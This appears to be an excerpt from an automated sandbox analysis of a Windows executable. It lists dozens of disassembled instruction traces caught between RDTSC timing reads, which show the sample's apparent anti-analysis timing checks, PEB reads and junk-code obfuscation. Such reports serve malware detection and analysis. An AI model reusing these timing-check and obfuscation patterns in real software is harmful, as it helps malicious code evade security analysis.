                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0832 second address: 49E06D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0008h 0x0000000b push 00401BF4h 0x00000010 push edi 0x00000011 mov dword ptr [0045F81Ch], eax 0x00000016 call esi 0x00000018 mov edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DA5 second address: 49C0DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7174CEBA91h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DC4 second address: 49C0DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DCA second address: 49C0DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DD0 second address: 49C0DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0DD4 second address: 4A116D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F7174CEBA90h 0x00000012 pop ebp 0x00000013 jmp 00007F7174CEBA90h 0x00000018 jmp dword ptr [74E51560h] 0x0000001e mov edi, edi 0x00000020 push ebp 0x00000021 mov ebp, esp 0x00000023 push esi 0x00000024 mov esi, dword ptr [ebp+08h] 0x00000027 push edi 0x00000028 mov edi, dword ptr fs:[00000018h] 0x0000002f cmp esi, 40h 0x00000032 jnc 00007F7174CEBA97h 0x00000034 mov eax, dword ptr [ebp+0Ch] 0x00000037 mov dword ptr [edi+esi*4+00000E10h], eax 0x0000003e mov eax, 00000001h 0x00000043 pop edi 0x00000044 pop esi 0x00000045 pop ebp 0x00000046 retn 0008h 0x00000049 test eax, eax 0x0000004b je 00007F7174CEBB41h 0x00000051 call 00007F7174CE9FB1h 0x00000056 mov edi, edi 0x00000058 push esi 0x00000059 call 00007F7174CED0E1h 0x0000005e push 00000000h 0x00000060 call 00007F7174CEBA0Ch 0x00000065 mov edi, edi 0x00000067 push ebp 0x00000068 mov ebp, esp 0x0000006a push esi 0x0000006b push dword ptr [00459714h] 0x00000071 mov esi, dword ptr [00401128h] 0x00000077 call esi 0x00000079 mov edi, edi 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007F7174CEBA97h 0x00000082 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116D5 second address: 4A116ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116ED second address: 4A116F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A116F1 second address: 4A1171E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F7174BA6FDCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007F7174BA6FDDh 0x00000019 pop eax 0x0000001a movsx ebx, si 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1171E second address: 4A11738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA96h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0509 second address: 49A051B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FDEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A051B second address: 49A0553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 pushfd 0x00000011 jmp 00007F7174CEBA94h 0x00000016 sbb ecx, 768A35B8h 0x0000001c jmp 00007F7174CEBA8Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0553 second address: 49A0592 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7174BA6FDFh 0x00000008 pop eax 0x00000009 mov edx, 379A2D2Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ecx, dword ptr [ebp+08h] 0x00000014 jmp 00007F7174BA6FDBh 0x00000019 sub eax, eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F7174BA6FE2h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0592 second address: 49A0598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0598 second address: 49A059C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A059C second address: 49A05E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc eax 0x0000000c jmp 00007F7174CEBA8Eh 0x00000011 lock xadd dword ptr [ecx], eax 0x00000015 jmp 00007F7174CEBA90h 0x0000001a inc eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F7174CEBA8Ah 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05E1 second address: 49A05E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A05E5 second address: 49A05EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10027 second address: 4A1004A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 mov cx, A601h 0x0000000b pop esi 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F7174BA6FDDh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1004A second address: 4A1004E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1004E second address: 4A10054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10054 second address: 4A1008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 call 00007F7174CEBA8Dh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jmp 00007F7174CEBA98h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1008F second address: 4A10095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10095 second address: 4A100A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100A4 second address: 4A100AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100AB second address: 4A10104 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7174CEBA98h 0x00000008 sub ecx, 7F557968h 0x0000000e jmp 00007F7174CEBA8Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F7174CEBA96h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7174CEBA8Dh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10104 second address: 4A10108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10108 second address: 4A1010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1010E second address: 4A1015C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F7174BA6FE0h 0x0000000f mov ebx, dword ptr [eax+10h] 0x00000012 jmp 00007F7174BA6FE0h 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F7174BA6FE7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1015C second address: 4A10227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov cl, 09h 0x0000000f mov ecx, edx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F7174CEBA91h 0x0000001a and eax, 3AE70106h 0x00000020 jmp 00007F7174CEBA91h 0x00000025 popfd 0x00000026 push esi 0x00000027 pushfd 0x00000028 jmp 00007F7174CEBA97h 0x0000002d sbb esi, 47F5703Eh 0x00000033 jmp 00007F7174CEBA99h 0x00000038 popfd 0x00000039 pop ecx 0x0000003a popad 0x0000003b mov esi, dword ptr [74E806ECh] 0x00000041 jmp 00007F7174CEBA97h 0x00000046 test esi, esi 0x00000048 jmp 00007F7174CEBA96h 0x0000004d jne 00007F7174CEC99Dh 0x00000053 jmp 00007F7174CEBA90h 0x00000058 xchg eax, edi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10227 second address: 4A1022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1022B second address: 4A10231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10231 second address: 4A10285 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, BED1h 0x00000007 pushfd 0x00000008 jmp 00007F7174BA6FDEh 0x0000000d sub si, A128h 0x00000012 jmp 00007F7174BA6FDBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c jmp 00007F7174BA6FE9h 0x00000021 xchg eax, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F7174BA6FDDh 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10285 second address: 4A102C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 jmp 00007F7174CEBA8Eh 0x0000001a push 00000044h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7174CEBA97h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102C9 second address: 4A103EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174BA6FDFh 0x00000009 or si, 328Eh 0x0000000e jmp 00007F7174BA6FE9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7174BA6FDAh 0x00000021 xor si, 7D08h 0x00000026 jmp 00007F7174BA6FDBh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F7174BA6FE8h 0x00000032 and esi, 32AD1F68h 0x00000038 jmp 00007F7174BA6FDBh 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, edi 0x00000040 jmp 00007F7174BA6FE6h 0x00000045 push eax 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F7174BA6FE1h 0x0000004d or al, 00000036h 0x00000050 jmp 00007F7174BA6FE1h 0x00000055 popfd 0x00000056 call 00007F7174BA6FE0h 0x0000005b jmp 00007F7174BA6FE2h 0x00000060 pop ecx 0x00000061 popad 0x00000062 xchg eax, edi 0x00000063 jmp 00007F7174BA6FE1h 0x00000068 push dword ptr [eax] 0x0000006a jmp 00007F7174BA6FDEh 0x0000006f mov eax, dword ptr fs:[00000030h] 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007F7174BA6FE7h 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103EF second address: 4A10407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA94h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104CA second address: 4A104D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104D0 second address: 4A104D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A104D4 second address: 4A10577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007F7174BA6FE9h 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 pushad 0x00000014 mov cx, 6683h 0x00000018 call 00007F7174BA6FE8h 0x0000001d movzx eax, bx 0x00000020 pop edx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 call 00007F7174BA6FE8h 0x0000002b pushfd 0x0000002c jmp 00007F7174BA6FE2h 0x00000031 adc cl, FFFFFFD8h 0x00000034 jmp 00007F7174BA6FDBh 0x00000039 popfd 0x0000003a pop ecx 0x0000003b call 00007F7174BA6FE9h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10577 second address: 4A105AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+10h], eax 0x00000009 jmp 00007F7174CEBA8Dh 0x0000000e mov eax, dword ptr [ebx+50h] 0x00000011 jmp 00007F7174CEBA8Eh 0x00000016 mov dword ptr [esi+14h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, dx 0x0000001f mov ebx, 017A39DCh 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A105AD second address: 4A10616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 jmp 00007F7174BA6FDAh 0x00000015 popad 0x00000016 mov dword ptr [esi+18h], eax 0x00000019 jmp 00007F7174BA6FE0h 0x0000001e mov eax, dword ptr [ebx+58h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F7174BA6FDDh 0x0000002a or cx, CA46h 0x0000002f jmp 00007F7174BA6FE1h 0x00000034 popfd 0x00000035 push esi 0x00000036 pop edx 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10616 second address: 4A1062E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174CEBA93h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1062E second address: 4A1063E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esi+1Ch], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1063E second address: 4A10642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10642 second address: 4A10646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10646 second address: 4A1064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1064C second address: 4A10656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 16DECE65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10656 second address: 4A1067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+5Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174CEBA98h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1067C second address: 4A10680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10680 second address: 4A10686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10686 second address: 4A106D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushfd 0x00000007 jmp 00007F7174BA6FE9h 0x0000000c sub cx, 4FC6h 0x00000011 jmp 00007F7174BA6FE1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+20h], eax 0x0000001d pushad 0x0000001e mov ax, C113h 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 mov eax, dword ptr [ebx+60h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106D5 second address: 4A106D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106D9 second address: 4A106DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106DD second address: 4A106E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106E3 second address: 4A10710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174BA6FE5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10710 second address: 4A10752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007F7174CEBA8Eh 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7174CEBA97h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10752 second address: 4A107BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7174BA6FDFh 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+68h] 0x00000011 jmp 00007F7174BA6FDBh 0x00000016 mov dword ptr [esi+2Ch], eax 0x00000019 pushad 0x0000001a mov bh, ah 0x0000001c pushfd 0x0000001d jmp 00007F7174BA6FE1h 0x00000022 adc ecx, 288C3806h 0x00000028 jmp 00007F7174BA6FE1h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ax, word ptr [ebx+6Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7174BA6FDDh 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107BC second address: 4A107F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F7174CEBA8Eh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107F0 second address: 4A108C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FDBh 0x00000008 pushfd 0x00000009 jmp 00007F7174BA6FE8h 0x0000000e jmp 00007F7174BA6FE5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b jmp 00007F7174BA6FDEh 0x00000020 mov eax, dword ptr [ebx+0000008Ch] 0x00000026 pushad 0x00000027 mov ecx, 02061A0Dh 0x0000002c mov ch, 4Ah 0x0000002e popad 0x0000002f mov dword ptr [esi+34h], eax 0x00000032 pushad 0x00000033 mov di, F6E6h 0x00000037 mov edi, 3DBE9B72h 0x0000003c popad 0x0000003d mov eax, dword ptr [ebx+18h] 0x00000040 jmp 00007F7174BA6FE9h 0x00000045 mov dword ptr [esi+38h], eax 0x00000048 pushad 0x00000049 mov ax, B7A3h 0x0000004d pushfd 0x0000004e jmp 00007F7174BA6FE8h 0x00000053 jmp 00007F7174BA6FE5h 0x00000058 popfd 0x00000059 popad 0x0000005a mov eax, dword ptr [ebx+1Ch] 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7174BA6FDDh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108C5 second address: 4A10946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA93h 0x00000009 add ecx, 0C07098Eh 0x0000000f jmp 00007F7174CEBA99h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+3Ch], eax 0x0000001b pushad 0x0000001c jmp 00007F7174CEBA8Ch 0x00000021 mov edx, eax 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 pushad 0x00000028 mov si, 91D9h 0x0000002c mov edi, esi 0x0000002e popad 0x0000002f mov dword ptr [esi+40h], eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F7174CEBA8Eh 0x00000039 and eax, 560A3E68h 0x0000003f jmp 00007F7174CEBA8Bh 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 mov ebx, esi 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10946 second address: 4A1094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1094A second address: 4A10976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebx+00000080h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F7174CEBA8Ah 0x00000016 xor si, 10C8h 0x0000001b jmp 00007F7174CEBA8Bh 0x00000020 popfd 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10976 second address: 4A109E6 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7174BA6FE8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f push 00000001h 0x00000011 jmp 00007F7174BA6FDFh 0x00000016 nop 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7174BA6FE4h 0x0000001e sub cl, FFFFFFB8h 0x00000021 jmp 00007F7174BA6FDBh 0x00000026 popfd 0x00000027 pushad 0x00000028 mov ecx, 2EA85E85h 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7174BA6FDAh 0x00000039 rdtsc
